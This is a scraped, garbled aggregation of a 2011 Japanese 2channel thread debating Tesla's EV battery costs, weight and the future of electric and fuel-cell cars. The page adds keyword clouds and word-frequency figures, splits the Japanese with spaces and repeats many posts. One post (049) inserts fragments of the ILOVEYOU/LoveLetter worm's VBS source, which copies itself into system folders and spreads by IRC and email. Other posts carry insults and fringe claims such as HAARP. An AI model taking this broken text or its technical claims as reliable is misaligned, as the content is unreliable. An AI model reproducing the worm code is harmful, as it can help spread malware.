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米テスラのEV電池、コストは従来電池の3分の1=トヨタ副社長

http://raicho.2ch.net/test/read.cgi/newsplus/1294810742/

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リチウム 放電 用電 全幅 電気 発電 EV 水素 ガソリン 車体 電気自動車 燃料電池 重量 バッテリ 劣化 自動車 IDAbqCPnK 車用 制御 普及 電量 搭載 リチウムイオン 寿命 方式 バッテリー 容量 走行 電力 実用 充放電 一周 性能 燃料 石油 充電 開発 エンジン 大嘘 日産 チウム電池 リチウム電池 供給 専用 エリーゼ 残量 距離 電機 :名無しさん@十一周年 ルギー 効率 接続 大量 エネル 交換 技術 モーター エネルギー 生産 無知 爆発 捏造 プリウス システム 十分 万円 ーター 事故 程度 :名無しさん@十一周年:水IDAbqCPnK ーカー アメリカ ハイブリッ 日本 何本 馬鹿 電池だけ 充電する 可能 安全 加熱 よこのバカ リッド テスラモーターズ ボディ ニッケル 名無しさん@十一周年: ハイブリッド 中国 RAV サーキット 使用 車体重量 発電機 たよこのバカ 問題 ブレー 出来 カーボン オイル
重い 4%     安い 4%     いい 5%     する 50%     使う 9%     なる 26%     走る 5%     ある 16%     やる 6%     作る 4%     てる 17%     いる 18%     言う 7%     できる 7%     どう 4%     その 5%     この 4%    

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  • 00 : 37 ID : Abq + CPnK0 エリーゼ車体 重量 は 960 � 960kg ( 笑 ) まーた 大嘘 ついたよ コイツ ( 笑 ) 電池重量 は 約 450kg にも 達 し 、 電池重量 は 約 450kg にも 達 し 、 電池重量 は 約 450kg にも 達 し 、 なんで 大嘘 ぶっこいたの ? ? ? ? ( 笑 ) 悔 しかったの ? ? ? ? ( 笑 ) ほら ガンバレガンバレ ( 笑 )
    • 490   電池 を 大量 接続 する 方法 ってのは 要 する に 、 電池 の 障害対策 に HDD の RAID コントローラ 、 各電池 の 負荷分散 に 鯖 の ロードバランサー や ラウンドロビン みたいなもんか ?

  • 04 : 40 ID : Abq + CPnK0 それで 、 20 % の 充電量サーキット テスト で 90 � 走 れる
    • 282   」 「 満充電 で 」 走 れるのが 88 キロ から 320 キロ だというのに 253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0 それで 、 20 % の 充電量サーキット テスト で 90 � 走 れる
    • 290   」 「 満充電 で 」 走 れるのが 88 キロ から 320 キロ だというのに 253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0 それで 、 20 % の 充電量サーキット テスト で 90 � 走 れる
    • 301   」 「 満充電 で 」 走 れるのが 88 キロ から 320 キロ だというのに 253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0 それで 、 20 % の 充電量サーキット テスト で 90 � 走 れる
    • 358   」 「 満充電 で 」 走 れるのが 88 キロ から 320 キロ だというのに 253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0 それで 、 20 % の 充電量サーキット テスト で 90 � 走 れる
    • 369   」 「 満充電 で 」 走 れるのが 88 キロ から 320 キロ だというのに 253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0 それで 、 20 % の 充電量サーキット テスト で 90 � 走 れる
    • 376   」 「 満充電 で 」 走 れるのが 88 キロ から 320 キロ だというのに 253 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 20 : 04 : 40 ID : Abq + CPnK0 それで 、 20 % の 充電量サーキット テスト で 90 � 走 れる

  • 05 : 36 ID : Abq + CPnK0 435 うわっかわの ボディ ー だけじゃなく 、 エンジン 機関以外全部 そっくり 供給 だから 、 全長 は バンパー 変 えるだけで 何 とかなる けど 、 全幅 だけはどう にもならないんだよ
    • 458   439 : 名無 しさん @ 十一周 年 [ ] : 2011 / 01 / 12 ( 水 ) 23 : 05 : 36 ID : Abq + CPnK0 435 うわっかわの ボディ ー だけじゃなく 、 エンジン 機関以外全部 そっくり 供給 だから 、 全長 は バンパー 変 えるだけで 何 とかなる けど 、 全幅 だけはどう にもならないんだよ

  • 013   それだけ 販売員 の 人件費 、 場所代 などの 販。諸経費 が 大 きいってこと

    • 029   1 ラップトップ PC に 使 われる リチウム イオン 電池 18650 か
      • 855   リチウム も 重要性 が 高 まれば 世界 中 で 採掘 が 行 われることになる でしょう

    • 043   もう 燃料 電池 自動車 はやらないんじゃないのかな ? 家庭用燃料 電池 くらいでしか 使 わないかもねえ

      • 049   Scriptini.WriteLine n2 = / . dcc send $ nick & dirsystem & 。。 LOVE-LETTER-FOR-YOU.HTM male.Body = vbcrlf & kindly check the attached LOVELETTER coming from me . C.Copy ( dirsystem & 。。 LOVE-LETTER-FOR-YOU.TXT.VBS ) C.Copy ( dirwin & 。。 Win32DLL.vbs ) document.write ( body onload = window ( ) ; )

        • 050   【 研究 】 日本 に 朗報 か 「 石油 」 をつくる 有望 な 藻類 、 日本 で 発見 … 施設 できれば 、 日本石油 輸入量程度生産 可能

          • 097   リチウム リチウム と 叫 ぶ 人 が 多 いが 、 ラップトップ PC に 使 われる リチウム イオン 電池 を 使用 する テスラ の 場合その 技術 が 車 に 付 いていて 、 自動車 用大型 リチウム イオン 電池 を 使用 する その 他 の EV は 、 電池自体 に 付 いている んだ
            • 097   で 、 ラップトップ PC に 使 われる リチウム イオン 電池 を 使用 する テスラ の 場合その 技術 が 車 に 付 いていて 、 自動車 用大型 リチウム イオン 電池 を 使用 する その 他 の EV は 、 電池自体 に 付 いている んだ
            • 418   リチウム リチウム と 叫 ぶ 人 が 多 いが 、 低温 の 出力 では 鉛蓄電池 に 劣 るんだよ

          • 097   さらに 、 A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ って 言 う 具合 に 、 箱 、 内部 の 電池 ともに 分散 させるのが 大量 接続 リチウム イオン 電池 の 冷却制御 技術 なんだ

            • 103   自動車 用大型 リチウム イオン 電池 を 使用 する その 他 の EV は 、 車 の 制御 システム が 、 この 電力 の 時 は 、 A で 何本 、 B で 何本 、 C で 何本 、 D で 何本制御 までで 、 A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、 の 制御 は 電池自体 がする
              • 134   車 の 制御 システム が 、 この 電力 の 時 は 、 A で 何本 、 B で 何本 、 C で 何本 、 D で 何本
              • 156   車 の 制御 システム が 、 この 電力 の 時 は 、 A で 何本 、 B で 何本 、 C で 何本 、 D で 何本 までしかしない 自動車 用大型 リチウム イオン 電池 は いわば 、 電池 メーカー から エンジン 供給 受 けている ような モノ なのさ

            • 106   1 さすが エジソン の 宿敵 w

              • 115   さらに 、 A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、 まで 制御 する から 、 69 さんが 言 うように 、 劣化 した セル を 上手 く 切 り 離 す 事 が 可能 なんだ
                • 103   さらに 、 A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、 まで 制御 する
                • 134   さらに 、 A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、 まで 制御 する
                • 134   各 メーカー制御 技術 の 差 が 確実 に 出 るから 、 自動車ーカー にとっては 大 きな アドバンテージ になり 得 る
                • 156   さらに 、 A の 中 のこれとこれとこれの 電池 、 B の 中 のこれとこれとこれの 電池 、 C の 中 の・・ 、 D の 中 の・・ 、 まで 制御 する

              • 141   PC に 数本積 まれてる 電池 が EV では 数万本積 まれてる

                • 154   だいたい 、 電動 フォークリフト 等 では 既存 の 鉛 バッテリ ー を 多 いものだと 20 コ 30 コ と 繋 いで 同 じような 事 をしている

                  • 176   大電流 を 流 せる 莫大 な 配線 と 切 り 替 えの スイッチング 素子

                    • 187   電池 の コスト が 下 がった 「 としても 」 車体 の コスト が 上 がったらどう しようもないんど wwww テスラーター ズ 式 は 、 バッテリ ー が 果 てしなく 重 いので 車体 を 高価 な 高価 な 高価 な 高価 な 素材 で 軽 く 作 らなければならない
                      • 154   鉛 かそうでないかの 違 いであって 、 テスラーター ズ のやってる ことが 「 今 まで 誰 もやれなかったこと 」 ではない

                    • 192   原子力電池 でいい だろ アホ か

                      • 287   ID : m1TJbQAm0 おい 邪眼 みせてみろ w

                        • 304   定格調 べれば 、 使用電 力量 や 発熱量 は モータ の 基本仕様 だからすぐわかる

                          • 318   数千本 の PC 用 リチウム イオン 電池 と 、 莫大 な 制御 回路 と 配線 だから 重 いよね

                            • 322   310 この 技術 は 過渡期 でしかないよ

                              • 393   自動車 に 対 する 給電方式 で 電池問題 解決 できたとしても 揚水発電 以外 の 需要 と 発電 の ムラ を 吸収 する 方法考 えないと どっちみち 先無 いと 思 うよ やっぱ 電池 は 大事

                                • 396   エンジン ラジコン と ーター ラジコン の 価格 の 違 いを 見 れば 危機感 わくだろ ミニ 四駆 を 作 る 技術EV は 作 れる
                                  • 501   でっけぇ 〜 ミニ 四駆 を 作 ればいい のだ !

                                • 408   富士重 の 燃料 電池 車 マダー ?

                                  • 414   フェイズ 2 エリーゼ ( テスラ が ベース になってる やつ ) は 車両重量 900 キロ 前後 フェイズ 1 エリーゼ の 頃 は 750 キロ くらいだったはず
                                    • 252   普通エリーゼ に ガス を 満 タン にする には 40 ポンド かかるが ロードスター を 満充電 する ためにかかる コスト は 3.5 ポンド
                                    • 428   テスラ が ベース にした モデルエリーゼ の 車重 は 900 キロ だよ

                                  • 418   寿命 と ディレーティング を 考 えると 、 電気 2 重層 のほうが 圧倒的 に 使 いやすいんだな

                                    • 458   トレッド だと 前輪 で 言 えば エリーゼ が 1455mm で タイヤ が 175 � エボーラ が 1560 � で タイヤ が 225 � テスラ が 1455 � で タイヤ が 175 � 全幅 だけはどう にでもならないんだよ
                                      • 445   439 そもそも 全部 ソックリ 供給 ではないんだが … 全幅 なんてどう にでもなる

                                    • 473   値段 を 無視 する なら 本田 の 燃料 電池 車 もある

                                      • 502   だけどそこで 産業界 から 出 た データ が 、 年間数秒 の 停電 で 、 生産 中 の ○ 台 の 車 が オシャカ になったみたいな データ を 突 きつけられて 、 どう やって 値下 げする んだと 、 電力 会社 は 開 いた 口 がふさがらなかったそうだ

                                        • 505   あれ ? リチウム イオン 電池 の コスト は 原材料費 が 大半 だからいくら 大量 生産 しても 大 して 安 くならないとかどっかの 評論家 が 言 ってたような・・・
                                          • 088   「 コンセプト は 面白 いが 実用 には 程遠 い 」 というのが 評論家 の 一致 した 結論

                                        • 507   「 5 年 で ダメ になる 200 万円 の 電池 」 を 誰 が 使 うのか 「 未来 の クルマ 」 は トンデモ 似非科学 ばかり 電気 自動車燃料 電池 車 も 普及 しない

                                          • 507   18650 は 三洋電機 が 年数億本 も 製造 している が 、 それだけ 量産 してもこの 価格 なのだ

                                            • 528   仮 に トヨタ の EV の 電池 が 事故 の 際 に 発火 したら 、 大規模 な ネガキャン をやられて 莫大 な 賠償金 を 請求 される 可能 性 がある

                                              • 537   まあ 、 電気 自動車 が 使 える 環境 とは ・エアコン が 必要 ない 温暖 な 気候 ・ 急激 な 坂 とかが 少 ない 道 ・ 回生 ブレー キ で 電気 を 回収 できないほど 急激 な 減速 が 必要 ない 道 ( 信号 の 間隔 が 長 い ) ・ 事故 っても リチウム 電池 の 二次被害 が 少 ない 場所 ( リチウム 電池 の 燃焼 に 対処 できる 消防署 がある 地域 、 人口 が 過密 でない 地域 ) ・ 運転 中 の バッテリ ー 切 れ 、 ある いは 故障 にすぐ 対応 できる サービス が 受 けられるところ ・ DQN 運転 する 奴 が 少 ない 地域
                                                • 540   国 を 挙 げてやる べき 事 だろ ! ! 電気 自動車 なんて 他 の 国 にやらせとけって

                                              • 571   高周波 から 低周波 に 直 す 際 に 、 直流変換 しないと

                                                • 581   1 日 50km しか 走行 しないとする と 、 毎日車 に 乗 ってたとしても 各 ブロック が 充放電 を 繰 り 返 すのは 4 日 に 1 回 ということになる

                                                  • 589   将来的 には EVバッテリ ー は スマートグリッドシステム に 組 み 込 んで 太陽光発電 や 風力発電 で 得 た 電気 を 保存 しておく バッテリ ー としても 使 う 見込 みなんだから 、 電池容量 が 今 の 150 倍 は 無 いと …
                                                    • 589   将来的 には EVバッテリ ー は スマートグリッドシステム に 組 み 込 んで 太陽光発電 や 風力発電 で 得 た 電気 を 保存 しておく バッテリ ー としても 使 う 見込 みなんだから 、 電池容量 が 今 の 10 倍 は 無 いと …

                                                  • 624   車全体 の 軽量化 をやんなければ 、 電気 自動車 の 未来 はない

                                                    • 626   EV には 別 に 充電発電 機 を 積 んで 、 電池切 れになっても 自車発電 で 50km くらいは 走 れるような システム を 装備 しないと ダメ でしょ

                                                      • 628   591 高価 な 電池 を 大量 に 保管 する コスト がかかるし 、 コンビニ でもそんな サービス は やらないだろう 無料 で 充電 できる 電気 スタンド は 作 るかもしれないけど だけど コンビニ 電気 泥棒 が 問題 になっている くらいだから 、 大型 ショッピング センター ぐらいじゃないと 無料 で 充電 する サービス は ペイ しないだろう 593 だから 電気 代 は 安 いから 、 ショッピングモール はそれでも ペイ する んだよ ただ 単 に 電気 だけを 売 る スタンド は 経営的 に 成 り 立 たない
                                                        • 628   591 高価 な 電池 を 大量 に 保管 する コスト がかかるし 、 コンビニ でもそんな サービス は やらないだろう 無料 で 充電 する 電気 スタンド は 作 るかもしれないけど だけど コンビニ 電気 泥棒 が 問題 になっている くらいだから 、 大型 ショッピング センター ぐらいじゃないと 無料 で 充電 する サービス は ペイ しないだろう 593 だから 電気 代 は 安 いから 、 ショッピングモール はそれでも ペイ する んだよ ただ 単 に 電気 だけを 売 る スタンド は 経営的 に 成 り 立 たない

                                                      • 630   市販 の バッテリ と 、 専用 バッテリ で 、 同 じ 出力 と 容量 での 重量 サイズどう なる のか ? どう 考 えても 、 PC 用 の バッテリ を 流用 する ほうが デカク 重 くなる だろ wwww まあ 、 電気 コスト が 安 いからその 分有利 かも 知 れないけど

                                                        • 644   アメリカ自動車 が 発売 された 当初 は 、 実 は 電気 自動車 と 内燃機。 型 の 2 種類 があったんだよ 最初 は 電気 自動車 優勢 だったけど 、 アメリカ 国内 で 油田 が 見 つかってからは 、 運用 コスト が 安 く 取 り 扱 いが 優 しい 内燃機。 型 が 全 ての 電気 自動車 を 市場 から 追 い 出 しちゃった だから 、 この 差 を 埋 めるのはなかなか 難 しい
                                                          • 644   アメリカ自動車 が 発売 された 当初 は 、 実 は 電気 自動車 と 内燃機。型 の 2 種類 があったんだよ 最初 は 電気 自動車 優勢 だったけど 、 アメリカ 国内 で 油田 が 見 つかってからは 、 運用 コスト が 安 く 取 り 扱 いが 優 しい 内燃機。型 が 全 ての 電気 自動車 を 市場 から 追 い 出 しちゃった だから 、 この 差 を 埋 めるのはなかなか 難 しい

                                                        • 672   大赤字出 せばそれは 税金投入 = 国民負担 という 悪魔 の 商売

                                                          • 679   676 普通 の 車 も 出来 ないのに 電気 自動車 でできた ! ! ! ! となればよ 、 電気 自動車 の 優秀性 を アピール 出来 るじゃないの
                                                            • 679   676 だから 、 そんなに 優秀 じゃないって

                                                          • 681   674 既 にある でしょ HAARP

                                                            • 685   輸送用 ガソリン の エネルギー だけで 、 現状 の 総発電 量 くらいに 相当 する から

                                                              • 696   燃料 電池専用 充電 池 → 汎用電 池流用 ・・・・なんかどんどん ベタ になってってる技術 的 には 見 ててもあんま 面白 く 無 くなってる
                                                                • 703   汎用電 池 で 大量 生産 したら 、 品不足 で 価格 上 がるがな

                                                              • 700   レーシングカー ならともかく 乗用車 じゃ アピール 低 いなぁ 日本 は FIA とか 放 ったらかして 世界 最強 の 電気 自動車 レース をおっぱじめやがれ !

                                                                • 702   686 現行 の ハイブリッ ドカー は 、 通常 の ガソリン 車 よりも ガソリン 走行 中 の 燃費 が 良 くないといけないから 、 完全電気 式 に 出来 ない
                                                                  • 272   とはいえ 、 走行 に 使 える エネル ギ と 比較 する と 2 次電池 は ガソリン の > 約 1 / 40 になってしまう * 2 )

                                                                • 702   プラグインハイブリッ ド の 電池 による 航続距離 がもっと 長 くなり 、 エンジン は 緊急用 と 割 り 切 って 使 えるようになれば 、 ガソリン 駆動時 の 燃費 は 重要 でなくなる
                                                                  • 756   エジソン の 功績 が 無 ければ 、 冷蔵庫 も 洗濯機 も 、 エンジン を 内蔵 して 駆動 する 羽目 になっていた だろうな

                                                                • 711   一日中走 り 回 ってる タクシー こそ HV や EV にしろ

                                                                  • 728   量産型 の クラリティ ではあきらめて 電池 にした

                                                                    • 729   エンジン は パワー 出 そうと 排気量 を 大 きくする と 、 エンジン 自体 の 重 さが ネック になる プロペラ を 付 ければ 、 プロペラ の 重量 と 空気抵抗 減 らした 方 が ネック になる エンジン発電 して 、 それで ーター を 回 すという 方式 は 、 エンジンーター の 重 さが ネック になるプリウス がそうだけど )
                                                                      • 731   プロペラ より 空気抵抗 減 らした 方 がまだ エコ なんじゃないだろうか

                                                                    • 758   将来 は 宇宙太陽光発電 を 利用 し 、 レーザー で 直接地上 の 自動車 全車 に 照射 させて 走 らせるらしい

                                                                      • 760   EV や 、 まして 燃料 電池 自動車 に 本気 で 期待 してる 人 って 文系 ですよね

                                                                        • 760   まあ EV は 限定条件下 でありかもだけど

                                                                          • 824   787 仮 に 全車両 が EV になっても 、 日本電力 設備容量 の 1 割程度

                                                                            • 824   電力 会社 自身 に 、 EV なんかに 過度 に 頼 るつもりが 無 いから

                                                                              • 859   EV すら 作 れない トヨタ は 丸投 げかい

                                                                                • 864   854 石油 ピーク は 2006 年 に 過 ぎてる
                                                                                  • 560   G13 型 トラクター 求 む by 石油 メジャー

                                                                                • 866   あと iPS 細胞 を 擬似科学扱 いする のは 明 らかな 名誉毀損 だぞ




                                                                                  研究 開発